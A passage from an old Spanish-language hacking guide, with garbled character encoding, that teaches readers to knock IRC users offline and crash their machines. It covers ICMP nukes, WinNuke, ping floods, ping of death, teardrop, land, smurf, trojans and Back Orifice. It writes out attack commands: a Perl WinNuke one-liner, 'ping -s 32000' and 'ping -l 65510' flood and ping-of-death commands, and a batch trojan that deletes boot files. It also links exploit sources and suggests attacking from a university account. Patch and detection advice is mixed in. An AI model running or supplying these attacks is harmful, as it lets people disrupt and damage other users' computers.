ocurrirφa en caso de servidores protegidos; si es no protegido el resultado es que ambos mueren, resultado tambiΘn aceptable, pues hemos acabado con nuestro objetivo. };-) 3.3.- Nuke.- "Nuke" es la denominaci≤n genΘrica que se le suele dar a cualquier forma de ataque consistente en mandar paquetes arbitrarios a una determinada direcci≤n IP (no es que sea una definici≤n demasiado ortodoxa pero bueno... :)). Realmente el tΘrmino "nuke" siempre se ha referido al primero de los dos tipos que comentaremos, aunque aquφ se ha preferido tomar una definici≤n mßs amplia de dicha palabra. 3.3.1.- ICMP nuke.- El mßs veterano de los nukes [ :-) ] usa un protocolo subyacente de IP, el ICMP ("Internet Control Message Protocol": parte integral del protocolo de Internet [IP] que resuelve errores y controla los mensajes), para romper una conexi≤n cliente-servidor de IRC (tirar a alguien del server). Para entender c≤mo funciona hay que hablar un poco de protocolos; es aburrido pero no hay mßs remedio... Una conexi≤n IRC (cliente-servidor, que es lo que nos interesa) utiliza el protocolo TCP (nivel 4 [transporte] en la torre OSI), el cual se apoya sobre IP (nivel 3 [red]). IP se encarga, entre otras cosas, de hacer el rutado de paquetes ("datagramas IP"), es decir, dado un destino ir enviando los paquetes por el camino apropiado hasta alcanzar el host destino. TCP no ve nada de esto, tan s≤lo el destino directamente (manda los segmentos TCP directamente al destino), porque IP lo oculta (hace que el rutado sea transparente a TCP). L≤gicamente para que un protocolo de nivel superior funcione correctamente, tambiΘn deberßn hacerlo todos los que estΘn por debajo. En particular, para que nuestra conexi≤n TCP (IRC) se mantenga "viva", IP debe funcionar perfectamente. Y aquφ es donde interviene ICMP: se encarga de informar de posibles anomalφas que se han producido en el nivel 3 (IP), como por ejemplo, "host unreachable", que significarφa que no se ha podido alcanzar el host (el paquete IP ha ido dando saltos ["hops"] de un nodo a otro, hacia el destino, y ha llegado un momento en el que un determinado nodo intermedio no sabφa quΘ hacer con Θl o ha expirado el tiempo de vida de dicho paquete). En este caso, el paquete que informa del error (ICMP) lo envφa el nodo intermedio que se ha dado cuenta del error hacia el "remitente" que lanz≤ el paquete original (que no se ha podido entregar a su destinatario). Los mensajes ICMP se situan dentro del campo de datos de un datagrama IP y se envφan exactamente igual que si fueran datos IP (no son prioritarios). No es objetivo de este escrito tratar mßs a fondo este tema (para los interesados les aconsejo el libro "Internetworking with TCP/IP, vol I", de Douglas E. Comer, disponible en castellano ya en su tercera edici≤n). Resumiendo: mediante ICMP informamos de que IP ha fallado, y por tanto, tambiΘn los niveles superiores como TCP. Comprendiendo lo anterior ya se puede intuir en quΘ consiste el ICMP nuke: mandar mensajes ICMP falseados, enga±ando al destino, haciΘndole creer que el otro extremo ha detectado un error y por tanto, provocando un "cierre" de la comunicaci≤n. Vamos a explicar un poco mejor Θsto. En una conexi≤n siempre tenemos dos extremos, lo que da dos posibilidades a la hora de enga±ar, seg·n lo hagamos a uno u otro. En el caso de una conexi≤n IRC, podemos llevar a cabo dos formas de ataque: * Server nuking (nukear al server): los mensajes ICMP se mandan al servidor IRC, haciΘndole creer que se ha producido un error al intentar comunicarse con el cliente. Como respuesta a este mensaje el server cierra la conexi≤n que tenφa con dicho cliente. El efecto producido es la "expulsi≤n" del usuario por parte del servidor. * Client nuking (nukear al cliente): esta vez se envφan los ICMP's al cliente; Θste cree que el servidor no estß disponible y cierra la conexi≤n (el cliente). El servidor no sabe nada en principio, pero detecta el cierre de conexi≤n por parte del cliente, dando el correspondiente error y cerrando tambiΘn la conexi≤n por su parte. En teorφa las dos fomas de nuking son perfectamente vßlidas y eficientes, aunque hay que tener ciertas consideraciones en cuenta, como son: - tanto servidor como cliente pueden tener protecci≤n anti-nuke y puede ser necesario atacar uno porque el otro estΘ protegido (ver mßs adelante). - si atacas a un cliente, Θste puede detectar quiΘn le estß atacando con un simple analizador de paquetes IP o tracer, y tambiΘn podrφa responder con otro ataque de este o cualquier otro tipo (cuidado con quiΘn te metes ;-)). - si atacas al servidor, el cliente no tiene manera de saber quiΘn le ha "atacado" porque los mensajes ICMP no le han llegado a Θl sino al servidor (ventaja); pero por otro lado, el servidor sφ sabe quiΘn ha hecho el ataque y puede resultar en una K/G-Line a dicho usuario por parte del servidor (el usuario podrφa ser baneado de toda la red de IRC). - los inconvenientes de los dos puntos anteriores pueden ser solventados falseando la direcci≤n origen de los mensajes ICMP que se envφan. Esta tΘcnica se conoce como "spoofing" (ver punto 4). Hay diversos tipos de error ICMP que se pueden utilizar a la hora de hacer un nuke. En cuanto a la informaci≤n prßctica de c≤mo utilizar un nuker (programa "nukeador"), debemos tener en cuenta que ademßs de suministrarle el tipo de error que se desea producir, juegan un papel muy importante los puertos, tanto origen como destino, que se elijan. Una conexi≤n IRC (TCP) queda definida unφvocamente por los pares direcci≤n IP origen-puerto origen y direcci≤n IP destino-puerto destino. Estos datos son los que hay que suministrarles al programa nukeador. Puertos tφpicos del servidor de IRC (serß el puerto destino en caso de server nuking o el fuente si se trata de un client nuking) son 6665-9, 4400-6, 7000 y 7777. En realidad cada servidor IRC tiene unos puertos oficialmente reconocidos (que son conocidos p·blicamente: los podemos leer en el motd ["mensaje del dia"] al entrar en el IRC) y otros que podrφamos denominar como privados, y que se usan por ejemplo para las conexiones entre los distintos servidores que forman la red. Un usuario puede estar usando uno de estos puertos "fantasmas" (aunque el servidor tambiΘn puede limitar el acceso a estos puertos) para esconderse de nukes, puesto que necesitamos conocer este dato para que el nuke sea efectivo. TambiΘn necesitamos conocer el puerto del cliente, aunque esto es mßs difφcil porque varφa mucho (no son fijos como en el caso anterior) dependiendo del sistema operativo que estΘ corriendo dicho cliente, los puertos que ya tuviera ocupados antes de establecer la conexi≤n IRC, Θtc. Lo normal es hacer un barrido de estos puertos empezando por el 1024 (hay puertos que por convenio siempre se asignan a determinadas tareas y no se pueden usar arbitrariamente con lo cual no necesitamos barrerlos) y acabando en 4000, por ejemplo, aunque podrφa ser necesario aumentar este n·mero. Es tambiΘn muy ·til utilizar un "port-scan": programa que va probando los distintos puertos de una direcci≤n IP (destino) dada e informa de la respuesta recibida para cada uno de dichos puertos (asφ podemos saber, por ejemplo, quΘ puertos de un servidor estßn dedicados a aceptar conexiones IRC). A continuaci≤n transcribo mensajes tφpicos de salida de nuestras potenciales vφctimas en una sesi≤n tφpica de IRC: [1:42] *** aRmiTaGe has quit IRC (Read error to aRmiTaGe[ig-183.arrakis.es]: Connection reset by peer) [1:13] *** KoNtRoL has quit IRC (Read error to KoNtRoL[195.76.99.76]: EOF from client) [3:17] *** BrOKeNn has quit IRC (Read error to BrOKeNn[194.224.57.171]: Protocol not available) [5:25] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Network is unreachable) [5:26] *** Eli has quit IRC (Read error to Eli[info760.jet.es]: Machine is not on the network) [4:20] *** vp has quit IRC (Read error to vp[ia-176.arrakis.es]: Connection refused) [2:41] *** Estrayk has quit IRC (Read error to Estrayk[ctv3011.ctv.es]: No route to host) La protecci≤n anti-nuke, a grosso modo, pasa por ignorar los mensajes ICMP que lleguen, aunque Θsto ya estß limitando el propio funcionamiento del protocolo IP, en el sentido de que ICMP es parte integrante de IP y no se deberφa inhibir (┐quΘ ocurrirφa si llega un mensaje "de verdad" y es ignorado?). Se puede llevar a cabo mßs o menos "finamente": por ejemplo descartar solo los ICMP's de un tipo y no todos los posibles. Se podrφa lograr con un firewall (software o hardware encargado de filtrar los paquetes provinientes de la red en base a una reglas previamente definidas) convenientemente configurado. Puedes echar un vistazo al listado fuente de un programa en C para mandar ICMP nuke's: puke.c <ircutils/puke.html> 3.3.2.- OOB nuke.- TambiΘn conocido como 'winnuke', ya que afecta s≤lo al sistema operativo Windows, en cualquiera de sus "sabores": 3.x, 95 y NT. Se basa en un bug que tiene este SO en la pila de protocolos por el cual el sistema se cuelga ("error de protecci≤n general...blah, blah...") cuando recibe un paquete con el flag OOB ("Out of band") activado. El ataque es sencillo: mandar un paquete de este tipo a un puerto (normalmente el 139) de nuestrß vφctima (Θsta debe estar corriendo Windows, lo cual es muy normal hoy en dφa). Existen programas ya hechos a los cuales simplemente le das la direcci≤n IP de la vφctima y el programa lo hace todo. La forma de protegerse es cerrar los puertos por los que nos puedan atacar (el 139 principalmente) o aplicar alg·n parche al SO para quitarnos el bug. Otra soluci≤n menos recomendable es la que llevan a cabo algunos ISPs (proveedores de Internet), y que consiste en filtrar todos los paquetes dirigidos al puerto 139 (inconveniente: nos estßn dejando inoperativo ese puerto). Hoy en dφa es muy popular este bug y normalmente estß ampliamente parcheado (aunque siempre habrß alg·n que otro despistado que no lo tenga instalado }=)). Como hemos dicho, este ataque no s≤lo consigue echar a la vφctima del server sino que ademßs le deja colgado el ordenador (tendrß que hacer un reboot), lo que lo hace especialmente peligroso. La vφctima saldrß del IRC con un mensaje de tipo ping-timeout como: [19:56] *** Goku has quit IRC (Ping timeout for Goku[system.tech.arrakis.es]) Aquφ teneis una curiosa muestra en PERL de c≤mo implementar el ataque (autor: Randal Schwartz): #!/usr/bin/perl use IO::Socket; IO::Socket::INET ->new(PeerAddr=>"bad.dude.com:139") ->send("bye", MSG_OOB); Y por ·ltimo, el programa definitivo en C, que tiene la ventaja de que spoofea la direcci≤n origen: winbomber.c <ircutils/winbomber.html> * Puedes encontrar informaci≤n oficial sobre el bug y links a los parches correspondientes (Win95 y NT) en: http://premium.microsoft.com/support/kb/articles/q168/7/47.asp 3.4.- Ping.- Algunos los llama tambiΘn "IP bombs" (bombas IP). Un ping es un tipo de mensaje ICMP que se usa para ver si una mßquina se encuentra operativa y accesible. El procedimiento es enviarle un ping a la mßquina; Θsta lo recibe y contesta. Al recibir la contestaci≤n ya sabemos que la mßquina vive. Si no se recibe en un plazo dado se considera como no accesible (la mßquina podrφa estar apagada, o todos los "caminos" en la red hacia ella cortados). Ademßs podemos obtener mßs datos como el grado de saturaci≤n de una mßquina o red (midiendo el tiempo de respuesta de la mßquina, es decir, el tiempo transcurrido desde que una mßquina origen envφa el ping hasta que recibe la contestaci≤n de la otra). La manera de usar esto de forma ofensiva consiste en mandar mßs pings a un usuario de los que su mßquina pueda contestar, saturßndole su conexi≤n a Internet. Por tanto se debe de hacer desde un enlace mßs potente que el que pretendemos atacar. Lo tφpico es que la vφctima estΘ en su casa y tenga un modem. Por tanto, necesitamos una conexi≤n a inet mßs rßpida que eso. Lo normal es atacar desde una mßquina ubicada ya en la red (conectada mediante ATM, FDDI, ...). Por ejemplo, puede valer la cuenta de la Universidad ;-). La forma de hacerlo serφa abriΘndonos un shell y tecleando: $ ping -s 32000 <direcc. IP> (la sintaxis puede variar ligeramente seg·n sistema operativo). Los paquetes que se envφan al hacer ping son tφpicamente muy peque±os. Con el modificador -s estamos forzando un nuevo tama±o (32000 bytes es aceptable; tambiΘn podeis probar con 64000). Pensad: un modem de 28.8 tardarß unos 18 segs. en recibir 64 Kbytes (sin considerar compresi≤n), mientras que desde nuestra shell lo hemos mandado en íídΘcimas de segundo!! Si consideramos ademßs que el comando ping manda mßs de un paquete (los que queramos) ... íboom! TendrΘis el modem de vuestra vφctima trabajando a toda pastilla para nada y fastidißndole todo lo que estΘ haciendo. En particular, le estropearΘis su conexi≤n al IRC: en el mejor de los casos la vφctima tendrß un lag horroroso y en el peor serß expulsada del servidor por "ping time-out". Desgraciadamente la soluci≤n para evitar este ataque no suele ser fßcil ya que no se trata de un bug que se pueda parchear sino de la propia mecßnica de los protocolos TCP/IP. Aconsejo usar un bouncer localizado en una mßquina potente capaz de absorber el ataque. 3.4.1.- Ping of death.- Este viejo ataque afecta a kernels muy antiguos (Linux 2.0.7 y 2.1.1, SunOS y HPUX antiguos, Θtc) y consigue "congelarlos" en el acto o provocar un "reboot". Consiste en mandar a la vφctima paquetes ICMP (de "ping", vulgarmente hablando) de un tama±o mayor al permitido por el kernel de la vφctima. L≤gicamente el ataque no se puede realizar desde una mßquina de caracterφsticas similares a la vφctima, por razones obvias. Sin embargo, sφ se conseguφa llevar a cabo desde una mßquina Win95 ≤ WinNT, ya que Θstas soportaban el tama±o de paquete requerido. El comando a usar desde estos SO's era: > ping -l 65510 host.victima N≤tese que este comando se refiere exclusivamente a Windows antiguos. Asφ, por ejemplo, no funciona en NT 4.0 (da como error "valor incorrecto para la opci≤n -l" ya que el mßximo ping que puede lanzar es de longitud 65500), pero sφ en versiones mßs antiguas y sin parchear. TambiΘn se puede lanzar desde Unix'es no demasiado antiguos. Para los antiguos sali≤ una versi≤n que emulaba el referido ping: simping.c <ircutils/simping.html> Hoy en dφa este ataque estß ampliamente superado y he decidido incluirlo en el documento por "razones hist≤ricas" :-). Aunque todavφa es posible encontrar mßquinas muy antiguas vulnerables a este ataque. TambiΘn es posible en la actualidad atacar alg·n Windows desde un Linux, p.ej. 3.5.- Ssping.- Nos encontramos ante otro bug parecido al del OOB, que afecta a Win95 y NT ( aunque no a todas las configuraciones), y cuya idea es que el "maravilloso" Windows "se lφa" a la hora de reconstruir paquetes que le han llegado fragmentados y acaba con un cuelgue del ordenador. El ataque consiste en precisamente mandar esos paquetes fragmentados a la vφctima. Un bug de este tipo es viejo conocido de los sistemas UNIX (el ataque se conocφa como "ping of death"); pero la novedad es que ahora lo sufren los Windows. Aunque son cosas tΘcnicamente diferentes, la forma de proceder a la hora de atacar es anßloga a OOB: solo hay que saber la direcci≤n IP de la vφctima y íboom!: le dejamos colgado el ordenador. La soluci≤n pasa por parchear el S.O. En particular, este bug parece que no afecta al Trumpet Winsock asφ que si lo usais estareis protegidos. 3.6.- Teardrop.- Este ataque nos recuerda al "ssping" ya que tambiΘn estß basado en un error al reensamblar paquetes fragmentados que le han llegado a la vφctima. Esta vez la pila TCP/IP se lφa al intentar ensamblar paquetes fragmentados que se solapan entre sφ (es decir, hay regiones de "datos" comunes en dos paquetes distintos) provocando el cuelgue del ordenador. A diferencia de "ssping" y "OOB" este bug afecta a multitud de S.O.'s, incluφdos Linux, Win95 y NT. * La soluci≤n a este bug pasa por parchear o actualizar nuestro S.O, a saber: - Linux: actualizar el kernel a 2.0.32 o superior. - Windows 95 y NT: informaci≤n y parches disponibles en: http://premium.microsoft.com/support/kb/articles/q154/1/74.asp ftp://ftp.microsoft.com/bussys/winnt/kb/Q154/1/74.TXT http://premium.microsoft.com/support/kb/articles/q174/0/95.asp Me parece que en Windows 95 basta con los siguientes parches (pero no os fieis demasiado, no los he probado): http://support.microsoft.com/download/support/mslfiles/Vtcpupd.exe http://support.microsoft.com/download/support/mslfiles/Vipup11.exe (para Winsock 1.1) http://support.microsoft.com/download/support/mslfiles/Vipup20.exe (para Winsock 2) (se recomienda hacer un backup de los ficheros vip.386, vtcp.386 y vnbt.386 antes de aplicar l os parches, por lo que pudiera pasar). 3.7.- Land.- Consiste en mandar a un host y puerto especificado (vφctima) un paquete spoofeado con el bit syn (petici≤n de conexi≤n) activo y con direcci≤n y puerto fuente los mismos a los cuales va dirigido el paquete (i.e. direcci≤n y puerto de la vφctima). Resumiendo, hacemos como si la mßquina vφctima quisiera realizar una conexi≤n a ella misma. Esto provoca el cuelgue de la mßquina vφctima en la mayorφa de los casos o en otros que la carga de la CPU alcance valores insospechados. Este bug afecta a una gran variedad de sistemas (routers incluφdos). Una lista bastante completa (pero nunca al 100%) de sistemas afectados es la siguiente: AIX 3 IS vulnerable AIX 3.2 NOT vulnerable AIX 4 NOT vulnerable AIX 4.1 NOT vulnerable AIX 4.2.1 NOT vulnerable AmigaOS AmiTCP 4.0demo NOT vulnerable AmigaOS AmiTCP 4.2 (Kickstart 3.0) IS vulnerable AmigaOS Miami 2.0 NOT vulnerable AmigaOS Miami 2.1f NOT vulnerable AmigaOS Miami 2.1p NOT vulnerable AmigaOS Miami 2.92c NOT vulnerable BeOS Preview Release 2 PowerMac IS vulnerable BSDI 2.0 IS vulnerable BSDI 2.1 (vanilla) IS vulnerable BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable BSDI 3.0 NOT vulnerable DG/UX R4.12 NOT vulnerable Digital UNIX 3.2c NOT vulnerable Digital UNIX 4.0 NOT vulnerable Digital VMS ??? IS vulnerable FreeBSD 2.1.6-RELEASE NOT vulnerable FreeBSD 2.2.2-RELEASE NOT vulnerable FreeBSD 2.2.5-RELEASE IS vulnerable FreeBSD 2.2.5-STABLE IS vulnerable (fixed) FreeBSD 3.0-CURRENT IS vulnerable (fixed) HP External JetDirect Print Servers IS vulnerable HP-UX 9.03 NOT vulnerable HP-UX 10.01 NOT vulnerable HP-UX 10.20 NOT vulnerable IBM AS/400 OS7400 3.7 IS vulnerable (100% CPU) IRIX 5.2 IS vulnerable IRIX 5.3 IS vulnerable IRIX 6.2 NOT vulnerable IRIX 6.3 NOT vulnerable IRIX 6.4 NOT vulnerable Linux 1.2.13 NOT vulnerable Linux 2.1.65 NOT vulnerable Linux 2.0.30 NOT vulnerable Linux 2.0.32 NOT vulnerable MacOS MacTCP IS vulnerable MacOS OpenTransport 1.1.1 NOT vulnerable MacOS 7.1p6 NOT vulnerable MacOS 7.5.1 NOT vulnerable MacOS 7.6.1 OpenTransport 1.1.2 IS vulnerable (not a compleate lockup) MacOS 8.0 IS vulnerable (TCP/IP stack crashed) MVS OS390 1.3 NOT vulnerable NetApp NFS server 4.1d IS vulnerable NetApp NFS server 4.3 IS vulnerable NetBSD 1.1 IS vulnerable NetBSD 1.2 IS vulnerable NetBSD 1.2a IS vulnerable NetBSD 1.2.1 IS vulnerable (fixed) NetBSD 1.3_ALPHA IS vulnerable (fixed) NeXTSTEP 3.0 IS vulnerable NeXTSTEp 3.1 IS vulnerable Novell 4.11 IS vulnerable (100% CPU for 30 secs) OpenBSD 2.1 (conflicting reports) OpenBSD 2.2 NOT vulnerable OpenVMS 7.1 with UCX 4.1-7 IS vulnerable OS/2 3.0 NOT vulnerable OS/2 4.0 NOT vulnerable QNX 4.24 IS vulnerable Rhapsody Developer Release IS vulnerable SCO OpenServer 5.0.2 SMP IS vulnerable SCO OpenServer 5.0.4 IS vulnerable (kills networking) SCO Unixware 2.1.1 IS vulnerable SCO Unixware 2.1.2 IS vulnerable Salaris 2.4 NOT vulnerable Solaris 2.5.1 NOT vulnerable Solaris 2.5.2 NOT vulnerable Solaris 2.6 NOT vulnerable SunOS 4.1.3 IS vulnerable SunOS 4.1.4 IS vulnerable Ultrix ??? NOT vulnerable Windows 95 (vanilla) IS vulnerable Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable Windows NT (vanilla) IS vulnerable Windows NT + SP3 IS vulnerable Windows NT + SP3 + simptcp-fix IS vulnerable Some misc stuff: 3Com Accessbuilder 600/700 NOT vulnerable 3Com LinkSwitch 1000 NOT vulnerable 3Com OfficeConnect 500 NOT vulnerable 3Com SuperStack II Switch 1000 IS vulnerable Adtran TSU Rack NOT vulnerable Apple LaserWriter IS vulnerable Ascend 4000 5.0Ap20 NOT vulnerable Ascend Pipeline 50 rev 5.0Ai16 NOT vulnerable Ascend Pipeline 50 rev 5.0Ap13 NOT vulnerable BayNetworks MARLIN 1000 OS (0).3.024(R) NOT vulnerable BinTec BIANCA/BRICK-XS 4.6.1 router IS vulnerable Cisco Classic IOS < 10.3, early 10.3, 11.0, 11.1, and 11.2 IS vulnerable Cisco IOS/700 IS vulnerable Cisco Catalyst IS vulnerable Digital VT1200 IS vulnerable Farallon Netopia PN440 NOT vulnerable HP Envizex Terminal IS vulnerable LaserJet Printer NOT vulnerable Livingston Office Router (ISDN) IS vulnerable Livingston PM ComOS 3.3.3 NOT vulnerable Livingston PM ComOS 3.5b17 + 3.7.2 NOT vulnerable Livingston PM ComOS 3.7L NOT vulnerable Livingston PM ComOS 3.7.2 NOT vulnerable Livingston Enterprise PM 3.4 2L NOT vulnerable Livingston T1/E1 OR IS vulnerable Milkyway Blackhole Firewall 3.0 (SunOS) IS vulnerable Milkyway Blackhole Firewall 3.02(SunOS) IS vulnerable NCD X Terminals, NCDWare v3.1.0 IS vulnerable NCD X Terminals, NCDWare v3.2.1 IS vulnerable Netopia PN440 v2.0.1 IS vulnerable Proteon GT60 NOT vulnerable Proteon GT60Secure NOT vulnerable Proteon GT70 NOT vulnerable Proteon GT70Secure NOT vulnerable Proteon GTAM NOT vulnerable Proteon GTX250 NOT vulnerable Proteon RBX250 NOT vulnerable Sonix Arpeggio NOT vulnerable Sonix Arpeggio + NOT vulnerable Sonix Arpeggio Lite NOT vulnerable Podeis comprobar la efectividad del ataque usando: land.c <ircutils/land.html> * Informaci≤n y parches para NT: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/land-fix/ Q165005.txt * Informaci≤n y parches para Win95: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/land-fix/ Q177539.TXT 3.8.- Teardrop modificado.- Nos encontramos ante una variante del temido teardrop. Esta vez lo que se hace es mandar paquetes UDP fragmentados a puertos aleatorios de la mßquina vφctima. La peculiaridad es que esta vulnerabilidad sigue existiendo en mßquinas Windows íya parcheadas contra teardrop! * Como siempre, para evitar este ataque tenemos que aplicar los correspondientes parches: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/ teardrop2-fix/ 3.9.- Smurf.- Consiste en mandar paquetes ICMP de "echo request" (como los de un ping) con una falsa direcci≤n de origen (la IP de la vφctima) a una direcci≤n de difusi≤n ("broadcast"). De esta forma alcanzarßn muchas mßquinas, cada una de las cuales enviarß sus paquetes de respuesta a la direcci≤n origen de la petici≤n (cuyos datos estaban falseados y apuntaban a la vφctima). El resultado es que la mßquina vφctima se ve inundada de paquetes IP, resultando en una saturaci≤n de su enlace (algo asφ como si le hubieran hecho un ping a lo grande). Desgraciadamente la vφctima no puede hacer nada para evitarlo. La soluci≤n estß en manos de los administradores de red, los cuales deben configurar adecuadamente sus routers para filtrar los paquetes ICMP de petici≤n indeseados (broadcast) o bien configurar sus mßquinas para que no respondan a dichos paquetes. Es decir, que lo que se parchea son las mßquinas/redes que puedan actuar de intermediarias (inocentes) en el ataque y no la mßquina vφctima. De igual forma tambiΘn se podrφa evitar el ataque si el router/firewall de salida del atacante (p.ej. el ISP al que pertenece) estuviera convenientemente configurado para evitar spoofing. Esto se harφa filtrando todos los paquetes de salida que tuvieran una direcci≤n source (origen) que no perteneciera a la red interna (desde la cual salimos). Para mßs informaci≤n sobre "smurf" os remito a: ~http://www.quadrunner.com/~c-huegen/smurf.txt 3.10.- Bonk (/Boink).- La mecßnica de este ataque es parecida a la del Teardrop. De hecho, se puede hablar de Teardrop a la inversa. Esta vez lo que se fuerza es a que el offset del fragmento sea mayor que la longitud de la cabecera. El intento de reensamblaje por parte de la vφctima conlleva el cuelgue del ordenador. Afecta a Win95 (y quizßs NT) incluso una vez parcheado contra Teardrop2. 3.11.- Syndrop.- Tal y como reza el comentario del siguiente source este bug es una mezcla de otros dos: el basado en secuencias con el flag SYN y el Teardrop. Es decir, es una variante mßs del Teardrop. 3.12.- Overdrop.- Afecta al kernel 2.0.33 de Linux y es mßs que nada molesto. Consiste en mandar paquetes incorrectos de forma que el kernel vφctima produzca los correspondientes mensajes de error, que normalmente son logeados en fichero. Se consigue pues llenar el disco duro o la consola de la vφctima con mensajes de este tipo. 3.13.- Nestea (/Nestea2).- Se trata de una nueva variante del Teardrop. 3.14.- Trojans.- Un "troyano" (o "trojan", en inglΘs) es un programa que "cuelan" en tu ordenador y que tiene otras funciones (normalmente perniciosas) en vez de o ademßs de las funciones normales (para lo que se supone que sirve el programa). En este sentido, es anßlogo a un virus, solo que no se extiende por sφ s≤lo (normalmente): hay que introducirlo "manualmente" a la vφctima y forzarla o convencerla para que lo ejecute. En el caso del IRC lo que se hace usualmente es mandßrselo a la vφctima vφa DCC. Cuando Θsta ejecuta el programa se ve infectada o le ocurre algo pernicioso }:-). Para que se entienda el concepto: imaginad que yo creo un fichero llamado "sorpresa.bat" con lo siguiente: @echo off del c:\autoexec.bat del c:\config.sys echo Sorpresa... Ahora se lo envφo a alguien y Θste lo ejecuta. Entonces se le borrarφan los ficheros de arranque };-) Esto que se ve tan simple se puede implementar de forma mucho mßs elaborada creando un .exe de forma que en principio no podemos saber lo que hace el programa internamente hasta que lo ejecutamos. Soluci≤n: como normal general no acepteis ficheros ejecutables de extra±os, o por lo menos, no los ejecuteis. Si os van a pasar alg·n programa extra±o es aconsejable que os pasen el source para que se le pueda echar un vistazo al programa, asegurarnos de que no hace "cosas raras" y entonces compilarlo nosotros mismos. Esto ·ltimo es lo mßs seguro. 3.14.1.- Mirc.ini.- Se trata del fichero de configuracion principal del cliente mIRC. Es muy potente porque permite scripting, o sea, crearte tus propios comandos a medida y automatizar tareas. Algunos graciosos se dedican a pasar por DCC una versi≤n "modificada" (troyana) que circula por ahφ y que entre otras cosas a±ade ciertos comandos para que remotamente un intruso pueda hacerte cosas en tu ordenador. S≤lo funcionarß si se consigue que el archivo troyano reemplace al archivo mirc.ini original, lo cual tampoco es fßcil ya que tendrφamos que tener configurado nuestro mIRC para que la zona de download apunte al directorio "raiz" de mIRC (de forma que el fichero recibido por DCC vaya al directorio donde se encuentran los ejecutables y ficheros de configuraci≤n de mIRC) y ademßs aceptar el DCC (o tener activada la opci≤n de "auto-get", o sea, de aceptar automßticamente los DCC's, cosa que no aconsejo en absoluto). Soluci≤n: no uses el "auto-get" ni aceptes ficheros de extra±os o que no sepas bien lo que hacen. 3.14.2.- Dmsetup.exe.- Este es un troyano que ·ltimamente ha circulado bastante y que no se realmente lo que hace porque no me he molestado en mirarlo (ni pienso hacerlo). Pero por lo que tengo entendido en concepto es algo similar al mirc.ini, o sea, permite acceso remoto a un intruso. Para buscar gente infectada creo que puedes escribir en el canal ".x." (o algo asφ) y los afectados por el troyano te responderßn vφa MSG de forma automßtica. 3.14.3.- Back Orifice.- TambiΘn conocida como "BO", por sus iniciales, es una herramienta escrita por el grupo "Cult of the Dead Cow" que permite la administraci≤n remota de una mßquina con Windows 95 / 98. Respetando el tradicional esquema cliente / servidor, el programa servidor es instalado en la mßquina a administrar y el cliente desde otra mßquina puede enviar comandos al servidor de forma que se obtiene un control total sobre la primera mßquina: podemos ejecutar comandos, listar ficheros, arrancar servicios de forma transparente, compartir directorios, subir y bajar ficheros, manipular el registro, matar o listar procesos, Θtc. La pßgina oficial del BO es: http://www.cultdeadcow.com El problema viene cuando un atacante se las ingenia para que una posible vφctima instale el software servidor en su mßquina, sin darse cuenta, al mßs puro estilo troyano. Esto es posible si por ejemplo el atacante le envφa a la vφctima el programa 'boserver.exe" renombrado a digamos "antinuke.exe", y Θsta, inocentemente, lo ejecuta creyendo que se trata del ·ltimo y fabuloso programa anti-nuke ;-). A partir de ese momento, el ordenador de la vφctima se encuentra "infectado" con lo que tΘcnicamente se denomina un "back-door" ("puerta trasera"), y el atacante o cualquiera que tenga el cliente de BO (y que sepa o adivine ciertos datos acerca de la configuraci≤n del servidor) podrß acceder al ordenador de la vφctima. Se trata de un grave problema de seguridad. Cuando ejecutamos el programa servidor, se instala el back-door, siguiendo los siguientes pasos: - se copia el programa servidor en el directorio de sistema de Windows (normalmente "c:\windows\system") con el nombre especificado por el usuario (/atacante). - se crea una entrada de registro en "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices" apuntando al nombre de fichero del servidor referido anteriormente y con una descripci≤n de "(Default)" o bien la que haya especificado el usuario (/atacante). - el servidor comenzarß a escuchar el puerto 31337 UDP o el especificado por el usuario (/atacante), atendiendo a las peticiones del cliente (/atacante). El protocolo usado utiliza una dΘbil encriptaci≤n, fßcil de romper. * C≤mo detectarlo: accedemos a la entrada del registro arriba nombrada, usando 'regedit.exe', y buscamos un servicio que no hayamos instalado nosotros. Si el fichero al que apunta es de una longitud aproximada de 124,928 bytes, entonces es posible que se trate de BO. Otra forma es usar el comando "netstat": C:\WINDOWS>netstat -an | find "UDP" UDP 0.0.0.0:31337 *:* * C≤mo eliminarlo: simplemente tenemos que borrar tanto el programa servidor del directorio de sistema de Windows como la entrada del registro que apunta hacia Θl (anteriormente mencionada). Teneis instrucciones aquφ: http://www.nwi.net/~pchelp/bo/bo.html * TambiΘn existen diversos programas que detectan y/o eliminan el BO, aunque hay que tener cuidado con ellos porque muchos no son mßs que nuevos troyanos (ej.: "BOsniffer.zip" o "*.exe"). La manera mßs fßcil y c≤moda de detectar / eliminar este back-door es usando un anti-virus actualizado, como puede ser el "AntiViral Toolkit Pro" (AVP): http://www.avp.ru/ (pßgina oficial) http://www.ontinet.com/avp/avp.htm (versi≤n en castellano) * C≤mo determinar la configuraci≤n de un BO instalado: ver el fichero del servidor usando un editor de texto (como el "Bloc de notas"). Si la ·ltima linea del fichero es '8 8$8(8,8084888<8@8D8H8L8P8T8X8\8'8d8h8l8' entonces estß usando la configuraci≤n por defecto. En caso contrario, la configuraci≤n estarß en las ·ltimas lineas del fichero, en este orden: <nombre del fichero> <descripci≤n del servicio> <n·mero de puerto> <password> <informaci≤n sobre plug-in adicional> * Plug-in's: se trata de c≤digo que a±ade funcionalidad extra al servidor. Se conocen como "BUTTplugs". Asφ por ejemplo existe un plug-in que hace que la vφctima conecte secretamente a un servidor y canal (ej.: #bo_owned en EFNET) de IRC dado, anuncißndose ante los demßs usuarios del canal como infectados. De esta forma, el atacante puede conectar a dicho servidor y canal de IRC (que se supone previamente conocido), y encontrarse las IP's de numerosas vφctimas. Algunos plug-in's conocidos: - Speakeasy: es el comentado del IRC. - Silk Rope: enlaza el BO a casi cualquier programa existente. - Saran Wrap: esconde el BO dentro de un programa instalador estßndar "InstallShield". - Butt Trumpet: manda al atacante un email con la direcci≤n IP de la mßquina vφctima, una vez que BO se ha instalado. Aquφ podeis encontrar los ·ltimos plug-in's: http://www.cultdeadcow.com/tools/bo_plugins.html * ┌ltimamente se han descubierto evidencias que nos inclina a pensar que tambiΘn el programa 